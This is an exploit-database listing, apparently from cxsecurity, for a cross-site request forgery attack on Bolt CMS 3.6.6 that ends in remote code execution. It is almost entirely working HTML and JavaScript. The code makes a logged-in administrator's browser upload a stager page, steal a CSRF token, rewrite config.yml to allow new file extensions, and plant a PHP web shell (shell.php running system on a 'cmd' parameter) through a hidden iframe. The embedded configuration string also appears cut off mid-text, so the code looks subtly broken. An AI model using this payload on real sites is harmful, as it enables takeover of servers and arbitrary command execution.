Bolt CMS 3.6.6 Cross Site Request Forgery / Code Execution

2019.04.09
Credit: Felipe Gaspar
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

<html> <body> <script>history.pushState('', '', '/')</script> <script> function exploit() { var target = "http://127.0.0.1" var bolt_admin_url = target + "/bolt"; var xhr = new XMLHttpRequest(); xhr.open("POST", bolt_admin_url + "/upload", true); xhr.setRequestHeader("Accept", "application\/json, text\/javascript, *\/*; q=0.01"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------130713229751679908527494159"); xhr.withCredentials = true; var body = "-----------------------------130713229751679908527494159\r\n" + "Content-Disposition: form-data; name=\"files[]\"; filename=\"stager.html\"\r\n" + "Content-Type: text/plain\r\n" + "\r\n" + "\x3cscript\x3e\r\n" + "\r\n" + "function exploit(){\r\n" + "\r\n" + " var bolt_admin_url = \""+bolt_admin_url+"\";\r\n" + "\r\n" + " var xhr = new XMLHttpRequest();\r\n" + " \r\n" + " if(xhr) {\r\n" + " xhr.open(\'GET\', bolt_admin_url + \"/file/edit/config/config.yml\", true);\r\n" + " xhr.onreadystatechange = handler;\r\n" + " xhr.send();\r\n" + " }\r\n" + "\r\n" + " function handler(){\r\n" + " if (xhr.readyState == 4 && xhr.status == 200) {\r\n" + " user_page = document.createElement(\'html\');\r\n" + " user_page.innerHTML = xhr.responseText;\r\n" + " token_input = (user_page.getElementsByTagName(\'input\')[0]).value;\r\n" + " console.log(\"Token obtained:\" + token_input);\r\n" + " ModifyAllowedExtensions(token_input);\r\n" + " UploadShell();\r\n" + " }\r\n" + " }\r\n" + "\r\n" + " function ModifyAllowedExtensions(token) {\r\n" + "\r\n" + " var xhr = new XMLHttpRequest();\r\n" + " xhr.open(\"POST\", bolt_admin_url + \"/file/edit/config/config.yml\", true);\r\n" + " xhr.setRequestHeader(\"Accept\", \"application\\/json, text\\/javascript, *\\/*; q=0.01\");\r\n" + " xhr.setRequestHeader(\"Accept-Language\", \"en-US,en;q=0.5\");\r\n" + " xhr.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");\r\n" + " xhr.withCredentials = true;\r\n" + " var body = \"file_edit%5B_token%5D=\"+token+\"&file_edit%5Bcontents%5D=%23+Database+setup.+The+driver+can+be+either+\\\'sqlite\\\'%2C+\\\'mysql\\\'+or+\\\'postgres\\\'.%0D%0A%23%0D%0A%23+For+SQLite%2C+only+the+databasename+is+required.+However%2C+MySQL+and+PostgreSQL%0D%0A%23+also+require+\\\'username\\\'%2C+\\\'password\\\'%2C+and+optionally+\\\'host\\\'+(+and+\\\'port\\\'+)+if+the+database%0D%0A%23+server+is+not+on+the+same+host+as+the+web+server.%0D%0A%23%0D%0A%23+If+you\\\'re+trying+out+Bolt%2C+just+keep+it+set+to+SQLite+for+now.%0D%0Adatabase%3A%0D%0A++++driver%3A+sqlite%0D%0A++++databasename%3A+bolt%0D%0A%0D%0A%23+The+name+of+the+website%0D%0Asitename%3A+A+sample+site%0D%0Apayoff%3A+The+amazing+payoff+goes+here%0D%0A%0D%0A%23+The+theme+to+use.%0D%0A%23%0D%0A%23+Don\\\'t+edit+the+provided+templates+directly%2C+because+they+_will_+get+updated%0D%0A%23+in+next+releases.+If+you+wish+to+modify+a+default+theme%2C+copy+its+folder%2C+and%0D%0A%23+change+the+name+here+accordingly.%0D%0Atheme%3A+base-2018%0D%0A%0D%0A%23+The+locale+that\\\'ll+be+used+by+the+application.+If+no+locale+is+set+the%0D%0A%23+fallback+locale+is+\\\'en_GB\\\'.+For+available+options%2C+see%3A%0D%0A%23+https%3A%2F%2Fdocs.bolt.cm%2Fother%2Flocales%0D%0A%23%0D%0A%23+In+some+cases+it+may+be+needed+to+specify+(non-standard)+variations+of+the%0D%0A%23+locale+to+get+everything+to+work+as+desired.%0D%0A%23%0D%0A%23+This+can+be+done+as+%5Bnl_NL%2C+Dutch_Netherlands%5D+when+specifying+multiple%0D%0A%23+locales%2C+ensure+the+first+is+a+standard+locale.%0D%0Alocale%3A+en_GB%0D%0A%0D%0A%23+Set+the+timezone+to+be+used+on+the+website.+For+a+list+of+valid+timezone%0D%0A%23+settings%2C+see%3A+http%3A%2F%2Fphp.net%2Fmanual%2Fen%2Ftimezones.php%0D%0A%23+timezone%3A+UTC%0D%0A%0D%0A%23+Set+maintenance+mode+on+or+off.%0D%0A%23%0D%0A%23+While+in+maintenance+mode%2C+only+users+of+level+editor+or+higher+can+access+the%0D%0A%23+site.%0D%0A%23%0D%0A%23+All+other+visitors+are+presented+with+a+notice+that+the+site+is+currently%0D%0A%23+offline.%0D%0A%23%0D%0A%23+The+default+template+file+can+be+found+in+%2Fapp%2Ftheme_defaults%2F+and+overridden%0D%0A%23+with+this+option+using+your+own+theme.%0D%0A%23%0D%0A%23+Note%3A+If+you\\\'ve+changed+the+filename%2C+and+your+changes+do+not+show+up+on+the%0D%0A%23+++++++website%2C+be+sure+to+check+for+a+config.yml+file+in+your+theme\\\'s+folder.%0D%0A%23+++++++If+a+template+is+set+there%2C+it+will+override+the+setting+here.%0D%0Amaintenance_mode%3A+false%0D%0Amaintenance_template%3A+maintenance_default.twig%0D%0A%0D%0A%23+The+hour+of+the+day+for+the+internal+cron+task+scheduler+to+run+daily%2C+weekly%2C%0D%0A%23+monthly+and+yearly+jobs.%0D%0A%23%0D%0A%23+Default%3A+3+(3+am)%0D%0Acron_hour%3A+3%0D%0A%0D%0A%23+If+your+site+is+reachable+under+different+urls+(say%2C+both+blog.example.org%2F%0D%0A%23+as+well+as+example.org%2F)%2C+it\\\'s+a+good+idea+to+set+one+of+these+as+the%0D%0A%23+canonical%2C+so+it\\\'s+clear+which+is+the+primary+address+of+the+site.%0D%0A%23%0D%0A%23+If+you+include+%60https%3A%2F%2F%60%2C+it+will+be+included+in+the+canonical+urls.%0D%0A%23canonical%3A+example.org%0D%0A%0D%0A%23+Bolt+can+insert+a+%3Clink+rel%3D%22shortcut+icon%22%3E+for+all+pages+on+the+site.%0D%0A%0D%0A%23+Note%3A+The+location+given+is+relative+to+the+currently+selected+theme.+If%0D%0A%23+++++++you+want+to+set+the+icon+yourself%2C+just+don\\\'t+enable+the+following+line.%0D%0A%23favicon%3A+images%2Ffavicon-bolt.ico%0D%0A%0D%0A%23+The+default+content+to+use+for+the+homepage%2C+and+the+template+to+render+it%0D%0A%23+with.+This+can+either+be+a+specific+record+(like+%60page%2F1%60)+or+a+listing+of%0D%0A%23+records+(like+%60entries%60).+In+the+chosen+\\\'homepage_template\\\'%2C+you+will+have%0D%0A%23+%60record%60+or+%60records%60+at+your+disposal%2C+depending+on+the+\\\'homepage\\\'+setting.%0D%0A%23%0D%0A%23+Note%3A+If+you\\\'ve+changed+the+filename%2C+and+your+changes+do+not+show+up+on%0D%0A%23+++++++the+website%2C+be+sure+to+check+for+a+theme.yml+file+in+your+theme\\\'s%0D%0A%23+++++++folder.+If+a+template+is+set+there%2C+it+will+overri " var aBody = new Uint8Array(body.length);\r\n" + " for (var i = 0; i \x3c aBody.length; i++)\r\n" + " aBody[i] = body.charCodeAt(i); \r\n" + " xhr.send(new Blob([aBody]));\r\n" + " }\r\n" + "\r\n" + " function UploadShell() {\r\n" + " var xhr = new XMLHttpRequest();\r\n" + " xhr.open(\"POST\", bolt_admin_url + \"/upload\", true);\r\n" + " xhr.setRequestHeader(\"Accept\", \"application\\/json, text\\/javascript, *\\/*; q=0.01\");\r\n" + " xhr.setRequestHeader(\"Accept-Language\", \"en-US,en;q=0.5\");\r\n" + " xhr.setRequestHeader(\"Content-Type\", \"multipart\\/form-data; boundary=---------------------------130713229751679908527494159\");\r\n" + " xhr.withCredentials = true;\r\n" + " var body = \"-----------------------------130713229751679908527494159\\r\\n\" + \r\n" + " \"Content-Disposition: form-data; name=\\\"files[]\\\"; filename=\\\"shell.php\\\"\\r\\n\" + \r\n" + " \"Content-Type: text/plain\\r\\n\" + \r\n" + " \"\\r\\n\" + \r\n" + " \"\\x3c?php echo(system($_GET[\\\'cmd\\\'])); ?\\x3e\\n\" + \r\n" + " \"\\r\\n\" + \r\n" + " \"-----------------------------130713229751679908527494159--\\r\\n\";\r\n" + " var aBody = new Uint8Array(body.length);\r\n" + " for (var i = 0; i \x3c aBody.length; i++)\r\n" + " aBody[i] = body.charCodeAt(i); \r\n" + " xhr.send(new Blob([aBody]));\r\n" + " }\r\n" + " }\r\n" + "\r\n" + " exploit();\r\n" + "\r\n" + "\x3c/script\x3e\r\n" + "\n" + "\r\n" + "-----------------------------130713229751679908527494159--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); setTimeout(function() { var dateObj = new Date(); var folder = dateObj.getFullYear() + "-" + (String("00"+(dateObj.getMonth()+1)).slice(-2)); document.getElementById('stager').src = target + "/files/"+folder+"/stager.html"; console.log("Called stager! Wait a moment and access: " + target + "/files/" + folder + "/shell.php?cmd=whoami"); }, 2000); } window.onload = function() { exploit(); }; </script> <iframe id="stager" style="width:0;height:0;border:0;border:none" src=""></iframe> </body> </html>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top